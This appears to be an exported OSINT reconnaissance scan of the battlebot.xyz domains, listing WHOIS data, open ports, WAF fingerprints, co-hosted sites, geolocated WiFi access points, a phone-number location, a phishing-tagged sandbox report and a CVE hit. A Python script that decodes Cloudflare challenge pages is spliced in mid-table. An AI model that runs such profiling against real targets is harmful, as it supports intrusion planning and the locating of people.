| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.187): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com | Domain Name: BATTLEBOT.XYZ
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2022-09-05T15:48:14.0Z
Creation Date: 2020-09-07T05:35:36.0Z
Registry Expiry Date: 2023-09-07T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: battlebot.xyz
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-08-08T05:51:35.56Z
Creation Date: 2020-09-07T05:35:36.00Z
Registrar Registration Expiration Date: 2023-09-07T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:59:45.60Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:75:F1:53) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2095 | 188.114.96.1 |
| 2023-05-12 03:09:08 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.92 | 165.232.113.85 |
| 2023-05-12 02:44:15 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.netlify.app, netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2087 | 188.114.97.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5D:6A:5B) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 227.30.196.104.bc.googleusercontent.com | 104.196.30.227 |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2600:1f18:2489:8200::c8 | pics.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:60:35:51) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | krillnet (Net ID: 00:01:8E:15:D4:A6) | 37.7813933,-122.3918002 |
| 2023-05-12 02:47:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report JSON omitted] | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | gamecocks (Net ID: 00:12:17:02:13:1F) | 32.8608, -79.9746 |
| 2023-05-12 03:11:27 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14806242598 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 700 (Net ID: 00:00:85:2B:6E:C9) | 41.8781, -87.6298 |
| 2023-05-12 02:45:06 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8003::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8003::153 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | donation.ecash-pay.com | 165.232.113.85 |
| 2023-05-12 02:48:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report JSON omitted] | 185.199.110.153 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:443 | 188.114.97.1 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.90): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2096 | 104.21.6.166 |
| 2023-05-12 02:54:22 | Web Content | No | Web Spider | 3 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="[opaque challenge token omitted]">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| www.ayhu.xyz |
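The raw body captured for www.ayhu.xyz above is not the site's content but a Cloudflare managed-challenge interstitial (`cType: 'managed'`), so any fingerprinting of "the web page" from that row would be fingerprinting Cloudflare. The script below is an added example (not part of this scan export or of any scanner module) that recognises such a body, decodes the base64 `cRq` fields (original URL, User-Agent, method, issue time) and compares the embedded ray id with a `cf-ray` response header. The `SAMPLE_HTML` literal is a constructed cut-down of the captured page; the regexes assume the one-field-per-line layout seen there.

```python
"""Recognise a Cloudflare managed-challenge body in scanner output and decode
the request metadata it embeds (added example; not part of the scan export)."""
import base64
import json
import re
from datetime import datetime, timezone

# Constructed sample: the _cf_chl_opt block from the captured page above,
# cut down to the fields this script reads.
SAMPLE_HTML = """<html><body>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cRay: '7c5f60715ea2423d',
cTplV: 5,
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
}
};
}());
</script>
</body></html>"""

# The object literal is emitted one "key: 'value'," per line; the nested cRq
# block uses the same layout, so one line-oriented regex covers both levels.
_OPT_RE = re.compile(r"window\._cf_chl_opt\s*=\s*\{(.*?)\n\};", re.S)
_FIELD_RE = re.compile(r"^\s*(\w+):\s*'([^']*)'\s*,?\s*$", re.M)
# cRq fields are base64: original URL, User-Agent, method, and a float epoch.
_B64_FIELDS = {"ru": "url", "ra": "user_agent", "rm": "method", "t": "timestamp"}


def _b64(s):
    """Decode base64 text, tolerating stripped '=' padding."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("utf-8", "replace")


def parse_cf_challenge(html):
    """Return None if html is not a Cloudflare challenge interstitial, else a
    dict with the zone, challenge type, ray id and the decoded cRq fields."""
    m = _OPT_RE.search(html)
    if m is None:
        return None
    fields = dict(_FIELD_RE.findall(m.group(1)))
    out = {
        "zone": fields.get("cZone"),
        "type": fields.get("cType"),
        "ray": fields.get("cRay"),
    }
    for key, name in _B64_FIELDS.items():
        if key in fields:
            out[name] = _b64(fields[key])
    if "timestamp" in out:
        issued = datetime.fromtimestamp(float(out["timestamp"]), tz=timezone.utc)
        out["issued_at"] = issued.isoformat()
    return out


def ray_matches_header(parsed, headers):
    """A cf-ray response header reads '<ray id>-<colo>'. A header row and a
    captured body belong to the same fetch only when the ray ids agree."""
    ray = headers.get("cf-ray", "").split("-")[0].lower()
    return bool(ray) and ray == (parsed.get("ray") or "").lower()


if __name__ == "__main__":
    print(json.dumps(parse_cf_challenge(SAMPLE_HTML), indent=2))
```

On the page's own data the decoded `t` is 1683860062.937, i.e. 2023-05-12 02:54:22 UTC, a few seconds after the `date` header in the "Non-Standard HTTP Header" row; the ray ids differ (7c5f60715ea2423d in the body, 7c5f60465c67192a in that header row), so those two rows come from separate fetches of the same zone.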
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-th.github.io |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.229): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | joe2-suddenlink_sucks (Net ID: 58:19:F8:9D:C6:A0) | 37.751, -97.822 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.184): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://htmlpreview.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_afc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2812"\n "IsoScope_afc_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_afc_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_afc_IE_EarlyTabStart_0xb00_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_afc_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_afc_ConnHashTable<2812>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2812"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"'}, 
{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"htmlpreview.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"htmlpreview.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002812]\n "~DFFF9DB304E6B28BC8.TMP" has type "data"- Location: [%TEMP%\\~DFFF9DB304E6B28BC8.TMP]- [targetUID: 00000000-00002812]\n "~DFA7F6F2C445876411.TMP" has type "data"- Location: [%TEMP%\\~DFA7F6F2C445876411.TMP]- [targetUID: 00000000-00002812]\n "~DF978321BDA8C8F83B.TMP" has type "data"- Location: [%TEMP%\\~DF978321BDA8C8F83B.TMP]- [targetUID: 
00000000-00002812]\n "~DFDDB9EA759F9F439A.TMP" has type "data"- Location: [%TEMP%\\~DFDDB9EA759F9F439A.TMP]- [targetUID: 00000000-00002812]\n "_546FF341-D397-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._546FF33F-D397-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "htmlpreview_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "_79B3E1B8-D398-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_5B37F14E-D397-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httphtmlpreview.github.io" has type "HTML document ASCII text"- [targetUID: N/A]\n "UI3DAOT0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UI3DAOT0.txt]- [targetUID: 00000000-00002968]\n "KDZQANEF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KDZQANEF.txt]- [targetUID: 00000000-00002812]\n "4V6LDXNK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4V6LDXNK.txt]- [targetUID: 00000000-00002812]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "MCXUEQXC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MCXUEQXC.txt]- [targetUID: 00000000-00002968]\n "ARJOOR8H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ARJOOR8H.txt]- [targetUID: 00000000-00002812]\n "LYJDCX59.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LYJDCX59.txt]- [targetUID: 00000000-00002812]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': 
u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /"\n Found http requests in header "GET /htmlpreview.js"\n Found http requests in header "GET /favicon.ico"\n Found http requests in header "GET /?"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://htmlpreview.github.io/"\n Pattern match: "http://htmlpreview.github.io"\n Pattern match: "https://api.codetabs.com/v1/proxy/?quest=\'];return"\n Heuristic match: "if (src.indexOf(\'//raw.githubusercontent.com\') > 0 || src.indexOf(\'//bitbucket.org\') > 0) { //Check if it\'s from raw.github.com or bitbucket.org"\n Heuristic match: "if (href.indexOf(\'//raw.githubusercontent.com\') > 0 || href.indexOf(\'//bitbucket.org\') > 0) { //Check if it\'s from raw.github.com or bitbucket.org"\n Pattern match: "https://api.codetabs.com/v1/proxy/?quest="\n Pattern match: "SUIDMmicrosoft.com/9216256238860831025177145958099031025060*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "https://github.com/user/repo/blob/master/index.html"\n Pattern match: "https://github.com/niutech"\n Pattern match: 
"SUIDMmicrosoft.com/9216256238860831025177145958099031025060*MUID3057AB3DCDCB69982AA2B9D7CC4F6801microsoft.com/1025269487782431103531145958099031025060*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "MUID0535B3A0912C6ADF1009A14A90606BF1msn.com/1025269487782431103531146379974031025060*"\n Pattern match: "MUIDB3057AB3DCDCB69982AA2B9D7CC4F6801ieonline.microsoft.com/9216269487782431103531145973724031025060*"\n Pattern match: "SUIDMmicrosoft.com/9216256238860831025177145958099031025060*MUID3057AB3DCDCB69982AA2B9D7CC4F6801microsoft.com/1025269487782431103531145958099031025060*_EDGE_V1microsoft.com/9216269487782431103531145989349031025060*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025358829734431061286146364349031025060*"\n Pattern match: "www.msn.com/"\n Heuristic match: "htmlpreview.github.io"\n Pattern match: "http://htmlpreview.github.io/Accept-Language"\n Pattern match: ".gith0.io/?httpg://gith0.co_twb9tboot9traptblobtgh-page9/2.3.2tindex.ht_"\n Heuristic match: "tmlpreview.github.io"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n 
Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: "wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc.dll/Error_ServiceInfo.htm\'res://wmploc.dll/Offline_InfoCenter.htm&res://wmploc.dll/Offline_AlbumInfo.htm"\n Pattern match: "wmploc.dll/Service_NoFunc.htm%res://wmploc.dll/Service_No_Local.htm"\n Pattern match: "wmploc.dll/RT_IMAGE/ServiceLarge.p | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | yigitcan (Net ID: 00:13:49:EC:E1:85) | 40.2024, 29.0398 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomE65548 (Net ID: 00:0C:F6:E6:55:48) | 50.8897, 6.0563 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Austria | beatrixhaller.at |
| 2023-05-12 03:09:13 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-14041
Score: Unknown
